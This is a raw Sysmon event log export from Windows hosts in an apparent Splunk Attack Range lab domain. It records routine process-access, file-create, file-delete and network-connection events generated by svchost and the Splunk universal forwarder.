10341000x80000000000000001094940Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:38.474{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
11241100x80000000000000001605982Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.906{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605981Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.906{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D4257724562023A2520FC663183024,SHA256=4C839DAA453141F66AF7884A07E3283C1B610FC0DD7E5C50E4ECDFDA54B3B79Bfalsefalse - insufficient disk space
23542300x80000000000000001094945Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:39.719{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B534082807419C11D2B114CFD2248A11,SHA256=1B47609C572A0D202C1697C2CB211094154A03294F9E59BB89106DCD78EC6FF7,IMPHASH=00000000000000000000000000000000falsetrue
354300x80000000000000001605980Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:37.668{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49721-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000-
11241100x80000000000000001605979Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616
23542300x80000000000000001605978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45E3CB2CB3E7EAD51870C8DB5C887478,SHA256=D5D6A495B8B87A0879B4C1905C247775CEC1B2998E34AEE0FCF4D12362AF154Bfalsefalse - insufficient disk space
11241100x80000000000000001605977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616
23542300x80000000000000001605976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:39.136{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37351B0ED8339EE76E2E38AC2B9E2508,SHA256=6E7C9BA1DDE2ADA3A21EE016301A42C07461303C47DE57623DA30EEFA8A48E0Cfalsefalse - insufficient disk space
10341000x80000000000000001094944Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:39.475{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094943Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:39.475{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
11241100x80000000000000001605984Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:40.909{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605983Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:40.909{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CB9DF3450094279F148C0EAC78741F,SHA256=0B1827E19DAF25BFFAA0B410B1FEE012B66AFC5A34CAA8FC8A1690F9F149B569falsefalse - insufficient disk space
23542300x80000000000000001094951Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.736{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D3BE51A51BB85D7D1CB73315D66D1C5,SHA256=6124A1BC791236ABD6BEEA72D4BBF6E1352BD8C34F0D5EE06B2119095F137C4F,IMPHASH=00000000000000000000000000000000falsetrue
354300x80000000000000001094950Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.845{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1138-false10.0.1.12-8000-
10341000x80000000000000001094949Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094948Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094947Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.250{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=944E80624A16CF2F545DC909D33E85C3,SHA256=05775D01DD39E75611D7D075C4A31BD8DE950979DF2D09CFBBD2A9F7DA357FB7,IMPHASH=00000000000000000000000000000000falsetrue
23542300x80000000000000001094946Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:40.249{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2512FB71664ABE554C473809A919C797,SHA256=F26D009005934EEA60C522879199BDCC2C0D931DF577F094B9A1EA717844BB0D,IMPHASH=00000000000000000000000000000000falsetrue
23542300x80000000000000001094954Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.738{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AAED3AD74F9BA0C13013C4E45C81A24,SHA256=DE7ECDFE24CD583273870C0C03E8EA0BF3AF18EC681806F0022DD629E32A46FE,IMPHASH=00000000000000000000000000000000falsetrue
10341000x80000000000000001094953Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094952Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:41.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094957Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:42.743{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7174CF8821D739FD69BB5BCB674E22,SHA256=73C5EFD8675D99A4E833871E88D13BA5B1D13D404A95B1258C09240C94E325EE,IMPHASH=00000000000000000000000000000000falsetrue
11241100x80000000000000001605986Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:42.112{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605985Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:42.112{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1909C0471892668B3E208F008B6F7B87,SHA256=51194D054091FC3E452E64BFD3E7538479643C399006B20B0223BE55CB584379falsefalse - insufficient disk space
10341000x80000000000000001094956Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:42.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094955Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:42.476{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094960Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.749{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99982FDA23C3EE1E67D77EA794494C3C,SHA256=9FF4D807CE34C46ABEB58212E77A141F4ABD135CB17DAB9D75099978A711649C,IMPHASH=00000000000000000000000000000000falsetrue
11241100x80000000000000001605988Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:43.114{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605987Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:43.114{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B963B5F997621C2FBACE3709AA0B56,SHA256=03C100EC8DB78D0843DF9B5BB39B8009C6001777341F383BED7C1C7C6F984893falsefalse - insufficient disk space
10341000x80000000000000001094959Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.477{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094958Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:43.477{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094963Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:44.752{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCE9D57E50E262D3ACFC1326A5B7B59D,SHA256=64AAD6EE0FBC8721D38229FB29BCB9BC96CD1DCED7A3710E2F34F87C8DB5BF39,IMPHASH=00000000000000000000000000000000falsetrue
354300x80000000000000001605995Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:42.680{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49722-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000-
11241100x80000000000000001605994Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.148{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605993Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.148{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C76C5FD297AC99EEA5CA41FDD729B6EE,SHA256=CCA7DF8F878A58E7503969B204DA1E7E4AF547B94DC5093D01E1FB47924C2A3Cfalsefalse - insufficient disk space
10341000x80000000000000001094962Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:44.478{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094961Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:44.478{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
11241100x80000000000000001605992Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616
23542300x80000000000000001605991Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86FC26166BC5467851CF946B767AC1D6,SHA256=F4CFAFF7EB271CE1CE37D678C5D9D245AE91F7DD2E92C11EA9B8831DDC1F5DDEfalsefalse - insufficient disk space
11241100x80000000000000001605990Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616
23542300x80000000000000001605989Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:44.132{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45E3CB2CB3E7EAD51870C8DB5C887478,SHA256=D5D6A495B8B87A0879B4C1905C247775CEC1B2998E34AEE0FCF4D12362AF154Bfalsefalse - insufficient disk space
23542300x80000000000000001094966Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:45.755{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFAACE5E30EA46F31F6BC050F6A9388,SHA256=366C06E12B7E9B963BF9606D0858DAA2B8F69D25D375F093B14DF6503FFF8BD1,IMPHASH=00000000000000000000000000000000falsetrue
11241100x80000000000000001605997Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:45.184{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072
23542300x80000000000000001605996Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:45.184{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E789567BA3133923C67A14BB73F4C1B5,SHA256=6732104CA4AAC9CF7CD252BFABC26351EF362274BB0B41A30632B1BE08FBB92Afalsefalse - insufficient disk space
10341000x80000000000000001094965Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:45.479{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x80000000000000001094964Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:45.479{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x80000000000000001094972Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:46.759{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90BE45253E779218D9939EC8814CAE19,SHA256=C7DCEDB113883E0C42FE8BC0A6C56021D3A06C7C7BFBE093E0D2FF56F9CE2DDA,IMPHASH=00000000000000000000000000000000falsetrue
